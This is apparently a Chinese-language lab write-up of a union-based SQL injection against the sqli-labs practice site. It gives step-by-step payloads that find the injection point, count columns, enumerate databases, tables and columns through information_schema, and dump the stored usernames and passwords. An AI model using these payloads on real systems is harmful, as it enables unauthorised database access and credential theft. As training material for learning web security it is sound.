判断注入点
经过?id=1 and 1=2与?id=1 and 1=1测试,id这个参数存在注入点
判断字段数量
经过?id=1 order by 3与?id=1 order by 4判断字段的数量是3个
判断回显数据的位置
使用?id=-1 union select 1,2,3判断2与3的位置是可以回显数据的位置。
爆破数据名称
使用?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata得到数据可的名称:
information_schema,challenges,mysql,performance_schema,security
爆破表名
使用?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’得到security数据库 中的表名:emails,referers,uagents,users
爆破字段名
使用:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = ‘users’可以得到users表中的字段名称为:id,username,password
爆破数据库
使用?id=-1 union select 1,group_concat(username),group_concat(password) from security.users可以得到security数据库中users表中username与password字段中的数据为:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
若有收获,就点个赞吧
0 人点赞
